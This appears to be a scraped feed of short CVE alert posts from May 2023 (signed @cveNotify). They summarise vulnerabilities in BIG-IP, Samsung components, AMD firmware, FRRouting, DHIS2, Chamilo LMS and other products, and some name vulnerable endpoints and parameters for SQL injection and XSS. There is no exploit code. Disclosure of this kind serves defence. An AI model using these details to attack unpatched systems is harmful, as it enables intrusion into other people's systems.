🚨 CVE-2023-27378Multiple reflected cross-site scripting (XSS) vulnerabilities exist in undisclosed pages of the BIG-IP Configuration utility which allow an attacker to run JavaScript in the context of the currently logged-in user. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-10 20:58:21 |
🚨 CVE-2023-24461An improper certificate validation vulnerability exists in the BIG-IP Edge Client for Windows and macOS and may allow an attacker to impersonate a BIG-IP APM system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-10 20:58:17 |
🚨 CVE-2023-21493Improper access control vulnerability in SemShareFileProvider prior to SMR May-2023 Release 1 allows local attackers to access protected data.🎖@cveNotify |
|
| 2023-05-10 20:58:16 |
🚨 CVE-2023-21491Improper access control vulnerability in ThemeManager prior to SMR May-2023 Release 1 allows local attackers to write arbitrary files with system privilege.🎖@cveNotify |
|
| 2023-05-10 20:58:15 |
🚨 CVE-2023-21492Kernel pointers are printed in the log file prior to SMR May-2023 Release 1 allows a privileged local attacker to bypass ASLR.🎖@cveNotify |
|
| 2023-05-10 19:58:14 |
🚨 CVE-2022-484833CX before 18 Hotfix 1 build 18.0.3.461 on Windows allows unauthenticated remote attackers to read %WINDIR%\system32 files via /Electron/download directory traversal in conjunction with a path component that has a drive letter and uses backslash characters. NOTE: this issue exists because of an incomplete fix for CVE-2022-28005.🎖@cveNotify |
|
| 2023-05-10 19:58:13 |
🚨 CVE-2023-30403An issue in the time-based authentication mechanism of Aigital Aigital Wireless-N Repeater Mini_Router v0.131229 allows attackers to bypass login by connecting to the web app after a successful attempt by a legitimate user.🎖@cveNotify |
|
| 2023-05-10 19:58:12 |
🚨 CVE-2022-30759In Nokia One-NDS (aka Network Directory Server) through 20.9, some Sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands.🎖@cveNotify |
|
| 2023-05-10 16:58:30 |
🚨 CVE-2023-31908Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component ecma_builtin_typedarray_prototype_sort.🎖@cveNotify |
|
| 2023-05-10 16:58:29 |
🚨 CVE-2023-27568SQL injection vulnerability inSpryker Commerce OS 0.9 that allows for access to sensitive data via customer/order?orderSearchForm[searchText]=🎖@cveNotify |
|
| 2023-05-10 16:58:28 |
🚨 CVE-2022-40302An issue was discovered in bgpd in FRRouting (FRR) through 8.4. By crafting a BGP OPEN message with an option of type 0xff (Extended Length from RFC 9072), attackers may cause a denial of service (assertion failure and daemon restart, or out-of-bounds read). This is possible because of inconsistent boundary checks that do not account for reading 3 bytes (instead of 2) in this 0xff case.🎖@cveNotify |
|
| 2023-05-10 16:58:24 |
🚨 CVE-2022-43681An out-of-bounds read exists in the BGP daemon of FRRouting FRR through 8.4. When sending a malformed BGP OPEN message that ends with the option length octet (or the option length word, in case of an extended OPEN message), the FRR code reads of out of the bounds of the packet, throwing a SIGABRT signal and exiting. This results in a bgpd daemon restart, causing a Denial-of-Service condition.🎖@cveNotify |
|
| 2023-05-10 16:58:23 |
🚨 CVE-2022-30338Incorrect default permissions in the Intel(R) VROC software before version 7.7.6.1003 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:22 |
🚨 CVE-2022-32766Improper input validation for some Intel(R) BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:19 |
🚨 CVE-2022-33894Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:18 |
🚨 CVE-2022-38087Exposure of resource to wrong sphere in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:17 |
🚨 CVE-2022-40210Exposure of data element to wrong session in the Intel DCM software before version 5.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:13 |
🚨 CVE-2022-41693Uncontrolled search path in the Intel(R) Quartus(R) Prime Pro edition software before version 22.3 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:12 |
🚨 CVE-2022-41801Uncontrolled resource consumption in the Intel(R) Connect M Android application before version 1.82 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-05-10 16:58:11 |
🚨 CVE-2022-31477Improper initialization for some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-10 11:58:25 |
🚨 CVE-2022-4008In affected versions of Octopus Deploy it is possible to upload a zipbomb file as a task which results in Denial of Service🎖@cveNotify |
|
| 2023-05-10 11:58:24 |
🚨 CVE-2023-2618A vulnerability, which was classified as problematic, has been found in OpenCV wechat_qrcode Module up to 4.7.0. Affected by this issue is the function DecodedBitStreamParser::decodeHanziSegment of the file qrcode/decoder/decoded_bit_stream_parser.cpp. The manipulation leads to memory leak. The attack may be launched remotely. The name of the patch is 2b62ff6181163eea029ed1cab11363b4996e9cd6. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-228548.🎖@cveNotify |
|
| 2023-05-10 11:58:23 |
🚨 CVE-2023-22361Improper privilege management vulnerability in SkyBridge MB-A100/110 firmware Ver. 4.2.0 and earlier allows a remote authenticated attacker to alter a WebUI password of the product.🎖@cveNotify |
|
| 2023-05-10 11:58:22 |
🚨 CVE-2023-22441Missing authentication for critical function exists in Seiko Solutions SkyBridge series, which may allow a remote attacker to obtain or alter the setting information of the product or execute some critical functions without authentication, e.g., rebooting the product. Affected products and versions are as follows: SkyBridge MB-A200 firmware Ver. 01.00.05 and earlier, and SkyBridge BASIC MB-A130 firmware Ver. 1.4.1 and earlier🎖@cveNotify |
|
| 2023-05-10 11:58:21 |
🚨 CVE-2023-23578Improper access control vulnerability in SkyBridge MB-A200 firmware Ver. 01.00.05 and earlier allows a remote unauthenticated attacker to connect to the product's ADB port.🎖@cveNotify |
|
| 2023-05-10 11:58:20 |
🚨 CVE-2023-23901Improper following of a certificate's chain of trust exists in SkyBridge MB-A200 firmware Ver. 01.00.05 and earlier, and SkyBridge BASIC MB-A130 firmware Ver. 1.4.1 and earlier, which may allow a remote unauthenticated attacker to eavesdrop on or alter the communication sent to the WebUI of the product.🎖@cveNotify |
|
| 2023-05-10 11:58:19 |
🚨 CVE-2023-23906Missing authentication for critical function exists in SkyBridge MB-A100/110 firmware Ver. 4.2.0 and earlier, which may allow a remote unauthenticated attacker to execute some critical functions without authentication, e.g., rebooting the product.🎖@cveNotify |
|
| 2023-05-10 11:58:18 |
🚨 CVE-2023-24586Cleartext storage of sensitive information exists in SkyBridge MB-A100/110 firmware Ver. 4.2.0 and earlier, which may allow a remote authenticated attacker to obtain an APN credential for the product.🎖@cveNotify |
|
| 2023-05-10 11:58:17 |
🚨 CVE-2023-25070Cleartext transmission of sensitive information exists in SkyBridge MB-A100/110 firmware Ver. 4.2.0 and earlier. If the telnet connection is enabled, a remote unauthenticated attacker may eavesdrop on or alter the administrator's communication to the product.🎖@cveNotify |
|
| 2023-05-10 11:58:16 |
🚨 CVE-2023-25072Use of weak credentials exists in SkyBridge MB-A100/110 firmware Ver. 4.2.0 and earlier, which may allow a remote unauthenticated attacker to decrypt password for the WebUI of the product.🎖@cveNotify |
|
| 2023-05-10 11:58:15 |
🚨 CVE-2023-25184Use of weak credentials exists in Seiko Solutions SkyBridge and SkySpider series, which may allow a remote unauthenticated attacker to decrypt password for the WebUI of the product. Affected products and versions are as follows: SkyBridge MB-A200 firmware Ver. 01.00.05 and earlier, SkyBridge BASIC MB-A130 firmware Ver. 1.4.1 and earlier, and SkySpider MB-R210 firmware Ver. 1.01.00 and earlier.🎖@cveNotify |
|
| 2023-05-10 11:58:14 |
🚨 CVE-2023-27385Heap-based buffer overflow vulnerability exists in CX-Drive All models V3.01 and earlier. By having a user open a specially crafted SDD file, arbitrary code may be executed and/or information may be disclosed.🎖@cveNotify |
|
| 2023-05-10 06:00:14 |
🚨 CVE-2023-30077Judging Management System v1.0 by oretnom23 was discovered to vulnerable to SQL injection via /php-jms/review_result.php?mainevent_id=, mainevent_id.🎖@cveNotify |
|
| 2023-05-10 06:00:13 |
🚨 CVE-2017-11197In CyberArk Viewfinity 5.5.10.95 and 6.x before 6.1.1.220, a low privilege user can escalate to an administrative user via a bug within the "add printer" option.🎖@cveNotify |
|
| 2023-05-10 06:00:12 |
🚨 CVE-2023-31434The parameters nutzer_titel, nutzer_vn, and nutzer_nn in the user profile, and langID and ONLINEID in direct links, in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 do not validate input, which allows authenticated attackers to inject HTML Code and XSS payloads in multiple locations.🎖@cveNotify |
|
| 2023-05-10 06:00:11 |
🚨 CVE-2023-31435Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly.🎖@cveNotify |
|
| 2023-05-10 06:00:08 |
🚨 CVE-2023-30861Flask is a lightweight WSGI web application framework. When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches `Set-Cookie` headers, it may send one client's `session` cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met.1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies.2. The application sets `session.permanent = True`3. The application does not access or modify the session at any point during a request.4. `SESSION_REFRESH_EACH_REQUEST` enabled (the default).5. The application does not set a `Cache-Control` header to indicate that a page is private or should not be cached.This happens because vulnerable versions of Flask only set the `Vary: Cookie` header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. This issue has been fixed in versions 2.3.2 and 2.2.5.🎖@cveNotify |
|
| 2023-05-10 06:00:07 |
🚨 CVE-2022-47757In imo.im 2022.11.1051, a path traversal vulnerability delivered via an unsanitized deeplink can force the application to write a file into the application's data directory. This may allow an attacker to save a shared library under a special directory which the app uses to dynamically load modules. Loading the library can lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-05-10 06:00:06 |
🚨 CVE-2022-39161IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0, and IBM WebSphere Application Server Liberty, when configured to communicate with the Web Server Plug-ins for IBM WebSphere Application Server, could allow an authenticated user to conduct spoofing attacks. A man-in-the-middle attacker could exploit this vulnerability using a certificate issued by a trusted authority to obtain sensitive information. IBM X-Force ID: 235069.🎖@cveNotify |
|
| 2023-05-10 06:00:05 |
🚨 CVE-2023-24744Cross Site Scripting (XSS) vulnerability in Rediker Software AdminPlus 6.1.91.00 allows remote attackers to run arbitrary code via the onload function within the application DOM.🎖@cveNotify |
|
| 2023-05-10 06:00:01 |
🚨 CVE-2023-30300An issue in the component hang.wasm of WebAssembly 1.0 causes an infinite loop.🎖@cveNotify |
|
| 2023-05-10 06:00:00 |
🚨 CVE-2023-31099Zoho ManageEngine OPManager through 126323 allows an authenticated user to achieve remote code execution via probe servers.🎖@cveNotify |
|
| 2023-05-10 05:59:59 |
🚨 CVE-2023-30331An issue in the render function of beetl v3.15.0 allows attackers to execute server-side template injection (SSTI) via a crafted payload.🎖@cveNotify |
|
| 2023-05-10 05:59:58 |
🚨 CVE-2022-36330A buffer overflow vulnerability was discovered on firmware version validation that could lead to an unauthenticated remote code execution in Western Digital My Cloud Home, My Cloud Home Duo and SanDisk ibi devices. An attacker would require exploitation of another vulnerability to raise their privileges in order to exploit this buffer overflow vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: through 9.4.0-191; ibi: through 9.4.0-191. 🎖@cveNotify |
|
| 2023-05-10 05:59:55 |
🚨 CVE-2023-25833There is an HTML injection vulnerability in Esri Portal for ArcGIS versions 11.0 and below that may allow a remote, authenticated attacker to create a crafted link which when clicked could render arbitrary HTML in the victim’s browser (no stateful change made or customer data rendered).🎖@cveNotify |
|
| 2023-05-10 05:59:54 |
🚨 CVE-2023-28126An authentication bypass vulnerability exists in Avalanche versions 6.3.x and below that could allow an attacker to gain access by exploiting the SetUser method or can exploit the Race Condition in the authentication message.🎖@cveNotify |
|
| 2023-05-10 05:59:53 |
🚨 CVE-2023-28128An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.3.x and below that could allow an attacker to achieve a remove code execution.🎖@cveNotify |
|
| 2023-05-10 00:58:36 |
🚨 CVE-2023-31478An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key.🎖@cveNotify |
|
| 2023-05-10 00:58:32 |
🚨 CVE-2023-28125An improper authentication vulnerability exists in Avalanche Premise versions 6.3.x and below that could allow an attacker to gain access to the server by registering to receive messages from the server and perform an authentication bypass.🎖@cveNotify |
|
| 2023-05-10 00:58:31 |
🚨 CVE-2023-28128An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.3.x and below that could allow an attacker to achieve a remove code execution.🎖@cveNotify |
|
| 2023-05-10 00:58:27 |
🚨 CVE-2023-28317A vulnerability has been discovered in Rocket.Chat, where editing messages can change the original timestamp, causing the UI to display messages in an incorrect order.🎖@cveNotify |
|
| 2023-05-10 00:58:26 |
🚨 CVE-2023-2156A flaw was found in the networking subsystem of the Linux kernel within the handling of the RPL protocol. This issue results from the lack of proper handling of user-supplied data, which can lead to an assertion failure. This may allow an unauthenticated remote attacker to create a denial of service condition on the system.🎖@cveNotify |
|
| 2023-05-10 00:58:25 |
🚨 CVE-2023-2610Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1532.🎖@cveNotify |
|
| 2023-05-09 22:58:39 |
🚨 CVE-2023-31433A SQL injection issue in Logbuch in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allows authenticated attackers to execute SQL statements via the welche parameter.🎖@cveNotify |
|
| 2023-05-09 22:58:38 |
🚨 CVE-2023-22637An improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability [CWE-79] in FortiNAC-F version 7.2.0, FortiNAC version 9.4.2 and below, 9.2 all versions, 9.1 all versions, 8.8 all versions, 8.7 all versions in License Management would permit an authenticated attacker to trigger remote code execution via crafted licenses.🎖@cveNotify |
|
| 2023-05-09 22:58:37 |
🚨 CVE-2023-1265An issue has been discovered in GitLab affecting all versions starting from 11.9 before 15.9.6, all versions starting from 15.10 before 15.10.5, all versions starting from 15.11 before 15.11.1. The condition allows for a privileged attacker, under certain conditions, to obtain session tokens from all users of a GitLab instance.🎖@cveNotify |
|
| 2023-05-09 22:58:33 |
🚨 CVE-2023-1965An issue has been discovered in GitLab EE affecting all versions starting from 14.2 before 15.9.6, all versions starting from 15.10 before 15.10.5, all versions starting from 15.11 before 15.11.1. Lack of verification on RelayState parameter allowed a maliciously crafted URL to obtain access tokens granted for 3rd party Group SAML SSO logins. This feature isn't enabled by default.🎖@cveNotify |
|
| 2023-05-09 22:58:32 |
🚨 CVE-2023-0896A default password was reported in Lenovo Smart Clock Essential with Alexa Built In that could allow unauthorized device access to an attacker with local network access. 🎖@cveNotify |
|
| 2023-05-09 22:58:31 |
🚨 CVE-2021-46755Failure to unmap certain SysHub mappings inerror paths of the ASP (AMD Secure Processor) bootloader may allow an attackerwith a malicious bootloader to exhaust the SysHub resources resulting in apotential denial of service.🎖@cveNotify |
|
| 2023-05-09 22:58:27 |
🚨 CVE-2021-46756Insufficient validation of inputs inSVC_MAP_USER_STACK in the ASP (AMD Secure Processor) bootloader may allow anattacker with a malicious Uapp or ABL to send malformed or invalid syscall tothe bootloader resulting in a potential denial of service and loss ofintegrity.🎖@cveNotify |
|
| 2023-05-09 22:58:26 |
🚨 CVE-2021-46760A malicious or compromised UApp or ABL can senda malformed system call to the bootloader, which may result in an out-of-boundsmemory access that may potentially lead to an attacker leaking sensitiveinformation or achieving code execution.🎖@cveNotify |
|
| 2023-05-09 22:58:25 |
🚨 CVE-2021-46765Insufficient input validation in ASP may allowan attacker with a compromised SMM to induce out-of-bounds memory reads withinthe ASP, potentially leading to a denial of service.🎖@cveNotify |
|
| 2023-05-09 22:58:24 |
🚨 CVE-2021-46773Insufficient input validation in ABL may enablea privileged attacker to corrupt ASP memory, potentially resulting in a loss ofintegrity or code execution.🎖@cveNotify |
|
| 2023-05-09 22:58:21 |
🚨 CVE-2021-46792Time-of-check Time-of-use (TOCTOU) in theBIOS2PSP command may allow an attacker with a malicious BIOS to create a racecondition causing the ASP bootloader to perform out-of-bounds SRAM reads uponan S3 resume event potentially leading to a denial of service.🎖@cveNotify |
|
| 2023-05-09 22:58:20 |
🚨 CVE-2021-46794Insufficient bounds checking in ASP (AMD SecureProcessor) may allow for an out of bounds read in SMI (System ManagementInterface) mailbox checksum calculation triggering a data abort, resulting in apotential denial of service.🎖@cveNotify |
|
| 2023-05-09 22:58:19 |
🚨 CVE-2021-26365Certain size values in firmware binary headerscould trigger out of bounds reads during signature validation, leading todenial of service or potentially limited leakage of information aboutout-of-bounds memory contents.🎖@cveNotify |
|
| 2023-05-09 20:58:35 |
🚨 CVE-2021-26354Insufficient bounds checking in ASP may allow anattacker to issue a system call from a compromised ABL which may causearbitrary memory values to be initialized to zero, potentially leading to aloss of integrity.🎖@cveNotify |
|
| 2023-05-09 20:58:34 |
🚨 CVE-2021-26365Certain size values in firmware binary headerscould trigger out of bounds reads during signature validation, leading todenial of service or potentially limited leakage of information aboutout-of-bounds memory contents.🎖@cveNotify |
|
| 2023-05-09 20:58:33 |
🚨 CVE-2021-26379Insufficient input validation of mailbox data in theSMU may allow an attacker to coerce the SMU to corrupt SMRAM, potentiallyleading to a loss of integrity and privilege escalation.🎖@cveNotify |
|
| 2023-05-09 20:58:29 |
🚨 CVE-2021-26397Insufficient address validation, may allow anattacker with a compromised ABL and UApp to corrupt sensitive memory locationspotentially resulting in a loss of integrity or availability.🎖@cveNotify |
|
| 2023-05-09 20:58:28 |
🚨 CVE-2021-46749Insufficient bounds checking in ASP (AMD SecureProcessor) may allow for an out of bounds read in SMI (System ManagementInterface) mailbox checksum calculation triggering a data abort, resulting in apotential denial of service.🎖@cveNotify |
|
| 2023-05-09 20:58:27 |
🚨 CVE-2021-46762Insufficient input validation in the SMU mayallow an attacker to corrupt SMU SRAM potentially leading to a loss ofintegrity or denial of service.🎖@cveNotify |
|
| 2023-05-09 20:58:23 |
🚨 CVE-2021-46764Improper validation of DRAM addresses in SMU mayallow an attacker to overwrite sensitive memory locations within the ASPpotentially resulting in a denial of service.🎖@cveNotify |
|
| 2023-05-09 20:58:22 |
🚨 CVE-2021-46775Improper input validation in ABL may enable anattacker with physical access, to perform arbitrary memory overwrites,potentially leading to a loss of integrity and code execution. 🎖@cveNotify |
|
| 2023-05-09 20:58:21 |
🚨 CVE-2022-23818Insufficient input validation on the modelspecific register: VM_HSAVE_PA may potentially lead to loss of SEV-SNP guestmemory integrity. 🎖@cveNotify |
|
| 2023-05-09 20:58:17 |
🚨 CVE-2023-20524An attacker with a compromised ASP couldpossibly send malformed commands to an ASP on another CPU, resulting in an outof bounds write, potentially leading to a loss a loss of integrity.🎖@cveNotify |
|
| 2023-05-09 20:58:16 |
🚨 CVE-2022-25772A cross-site scripting (XSS) vulnerability in the web tracking component of Mautic before 4.3.0 allows remote attackers to inject executable javascript🎖@cveNotify |
|
| 2023-05-09 20:58:15 |
🚨 CVE-2022-25274Drupal 9.3 implemented a generic entity access API for entity revisions. However, this API was not completely integrated with existing permissions, resulting in some possible access bypass for users who have access to use revisions of content generally, but who do not have access to individual items of node and media content. This vulnerability only affects sites using Drupal's revision system.🎖@cveNotify |
|
| 2023-05-09 19:58:35 |
🚨 CVE-2023-30085Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the cws2fws function in util/decompile.c.🎖@cveNotify |
|
| 2023-05-09 19:58:34 |
🚨 CVE-2023-25834Changes to user permissions in Portal for ArcGIS 10.9.1 and below are incompletely applied in specific use cases. This issue may allow users to access content that they are no longer privileged to access.🎖@cveNotify |
|
| 2023-05-09 19:58:32 |
🚨 CVE-2023-30086Buffer Overflow vulnerability found in Libtiff V.4.0.7 allows a local attacker to cause a denial of service via the tiffcp function in tiffcp.c.🎖@cveNotify |
|
| 2023-05-09 19:58:31 |
🚨 CVE-2023-31138DHIS2 Core contains the service layer and Web API for DHIS2, an information system for data capture. Starting in the 2.36 branch and prior to versions 2.37.9.1, 2.38.3.1, and 2.39.1.2, using object model traversal in the payload of a PATCH request, authenticated users with write access to an object may be able to modify related objects that they should not have access to. DHIS2 implementers should upgrade to a supported version of DHIS2 to receive a patch: 2.37.9.1, 2.38.3.1, or 2.39.1.2. It is possible to work around this issue by blocking all PATCH requests on a reverse proxy, but this may cause some issues with the functionality of built-in applications using legacy PATCH requests.🎖@cveNotify |
|
| 2023-05-09 19:58:30 |
🚨 CVE-2023-31139DHIS2 Core contains the service layer and Web API for DHIS2, an information system for data capture. Starting in the 2.37 branch and prior to versions 2.37.9.1, 2.38.3.1, and 2.39.1.2, Personal Access Tokens (PATs) generate unrestricted session cookies. This may lead to a bypass of other access restrictions (for example, based on allowed IP addresses or HTTP methods). DHIS2 implementers should upgrade to a supported version of DHIS2: 2.37.9.1, 2.38.3.1, or 2.39.1.2. Implementers can work around this issue by adding extra access control validations on a reverse proxy.🎖@cveNotify |
|
| 2023-05-09 19:58:28 |
🚨 CVE-2023-31143mage-ai is an open-source data pipeline tool for transforming and integrating data. Those who use Mage starting in version 0.8.34 and prior to 0.8.72 with user authentication enabled may be affected by a vulnerability. The terminal could be accessed by users who are not signed in or do not have editor permissions. Version 0.8.72 contains a fix for this issue.🎖@cveNotify |
|
| 2023-05-09 19:58:27 |
🚨 CVE-2023-32060DHIS2 Core contains the service layer and Web API for DHIS2, an information system for data capture. Starting in the 2.35 branch and prior to versions 2.36.13, 2.37.8, 2.38.2, and 2.39.0, when the Category Option Combination Sharing settings are configured to control access to specific tracker program events or program stages, the `/trackedEntityInstances` and `/events` API endpoints may include all events regardless of the sharing settings applied to the category option combinations. When this specific configuration is present, users may have access to events which they should not be able to see based on the sharing settings of the category options. The events will not appear in the user interface for web-based Tracker Capture or Capture applications, but if the Android Capture App is used they will be displayed to the user. Versions 2.36.13, 2.37.8, 2.38.2, and 2.39.0 contain a fix for this issue. No workaround is known.🎖@cveNotify |
|
| 2023-05-09 19:58:26 |
🚨 CVE-2023-30087Buffer Overflow vulnerability found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_mk_string function in mjs.c.🎖@cveNotify |
|
| 2023-05-09 19:58:25 |
🚨 CVE-2023-30088An issue found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_execute function in mjs.c.🎖@cveNotify |
|
| 2023-05-09 19:58:24 |
🚨 CVE-2023-31144Craft CMS is a content management system. Starting in version 3.0.0 and prior to versions 3.8.4 and 4.4.4, a malformed title in the feed widget can deliver a cross-site scripting payload. This issue is fixed in version 3.8.4 and 4.4.4.🎖@cveNotify |
|
| 2023-05-09 19:58:23 |
🚨 CVE-2023-31476An issue was discovered on GL.iNet devices running firmware before 3.216. There is an arbitrary file write in which an empty file can be created almost anywhere on the filesystem, as long as the filename and path is no more than 6 characters (the working directory is /www).🎖@cveNotify |
|
| 2023-05-09 19:58:22 |
🚨 CVE-2023-31489An issue found in Frrouting bgpd v.8.4.2 allows a remote attacker to cause a denial of service via the bgp_capability_llgr() function.🎖@cveNotify |
|
| 2023-05-09 19:58:21 |
🚨 CVE-2023-31490An issue found in Frrouting bgpd v.8.4.2 allows a remote attacker to cause a denial of service via the bgp_attr_psid_sub() function.🎖@cveNotify |
|
| 2023-05-09 19:58:20 |
🚨 CVE-2023-31799Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the system annnouncements parameter.🎖@cveNotify |
|
| 2023-05-09 19:58:16 |
🚨 CVE-2023-31800Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.🎖@cveNotify |
|
| 2023-05-09 19:58:15 |
🚨 CVE-2023-31801Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.🎖@cveNotify |
|
| 2023-05-09 19:58:14 |
🚨 CVE-2023-31802Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.🎖@cveNotify |
|
| 2023-05-09 19:58:13 |
🚨 CVE-2023-31803Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the resource sequencing parameters.🎖@cveNotify |
|
| 2023-05-09 19:58:12 |
🚨 CVE-2023-31804Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.🎖@cveNotify |
|
| 2023-05-09 12:58:11 |
🚨 CVE-2023-2591Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.7.🎖@cveNotify |
|
| 2023-05-09 11:58:12 |
🚨 CVE-2023-2590Missing Authorization in GitHub repository answerdev/answer prior to 1.0.9.🎖@cveNotify |
|
| 2023-05-09 05:58:33 |
🚨 CVE-2023-30455An issue was discovered in ebankIT before 7. A Denial-of-Service attack is possible through the GET parameter EStatementsIds located on the /Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashx endpoint. The GET parameter accepts over 100 comma-separated e-statement IDs without throwing an error. When this many IDs are supplied, the server takes around 60 seconds to respond and successfully generate the expected ZIP archive (during this time period, no other pages load). A threat actor could issue a request to this endpoint with 100+ statement IDs every 30 seconds, potentially resulting in an overload of the server for all users.🎖@cveNotify |
|
| 2023-05-09 05:58:32 |
🚨 CVE-2022-44419In modem, there is a possible missing verification of NAS Security Mode Command Replay Attacks in LTE. This could local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-09 05:58:31 |
🚨 CVE-2022-47486In ext4fsfilter driver, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 05:58:27 |
🚨 CVE-2022-47491In soter service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 05:58:26 |
🚨 CVE-2022-47495In soter service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 05:58:25 |
🚨 CVE-2022-48381In modem control device, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 05:58:21 |
🚨 CVE-2022-39089In mlog service, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 05:58:20 |
🚨 CVE-2022-47334In phasecheck server, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 05:58:19 |
🚨 CVE-2022-44420In modem, there is a possible missing verification of HashMME value in Security Mode Command. This could local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-09 05:58:16 |
🚨 CVE-2022-44433In phoneEx service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-09 05:58:15 |
🚨 CVE-2022-47487In thermal service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-05-09 05:58:14 |
🚨 CVE-2022-47470In ext4fsfilter driver, there is a possible out of bounds read due to a missing bounds check. This could local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-05-09 01:58:38 |
🚨 CVE-2023-2582A prototype pollution vulnerability exists in Strikingly CMS which can result in reflected cross-site scripting (XSS) in affected applications and sites built with Strikingly. The vulnerability exists because of Strikingly JavaScript library parsing the URL fragment allows access to the __proto__ or constructor properties and the Object prototype. By leveraging an embedded gadget like jQuery, an attacker who convinces a victim to visit a specially crafted link could achieve arbitrary javascript execution in the context of the user's browser.🎖@cveNotify |
|
| 2023-05-09 01:58:36 |
🚨 CVE-2023-30334AsmBB v2.9.1 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the MiniMag.asm and bbcode.asm libraries.🎖@cveNotify |
|
| 2023-05-09 01:58:35 |
🚨 CVE-2023-31123`effectindex/tripreporter` is a community-powered, universal platform for submitting and analyzing trip reports. Prior to commit bd80ba833b9023d39ca22e29874296c8729dd53b, any user with an account on an instance of `effectindex/tripreporter`, e.g. `subjective.report`, may be affected by an improper password verification vulnerability. The vulnerability allows any user with a password matching the password requirements to log in as any user. This allows access to accounts / data loss of the user. This issue is patched in commit bd80ba833b9023d39ca22e29874296c8729dd53b. No action necessary for users of `subjective.report`, and anyone running their own instance should update to this commit or newer as soon as possible. As a workaround, someone running their own instance may apply the patch manually.🎖@cveNotify |
|
| 2023-05-09 01:58:34 |
🚨 CVE-2023-31125Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. An uncaught exception vulnerability was introduced in version 5.1.0 and included in version 4.1.0 of the `socket.io` parent package. Older versions are not impacted. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the `engine.io` package, including those who use depending packages like `socket.io`. This issue was fixed in version 6.4.2 of Engine.IO. There is no known workaround except upgrading to a safe version.🎖@cveNotify |
|
| 2023-05-09 01:58:32 |
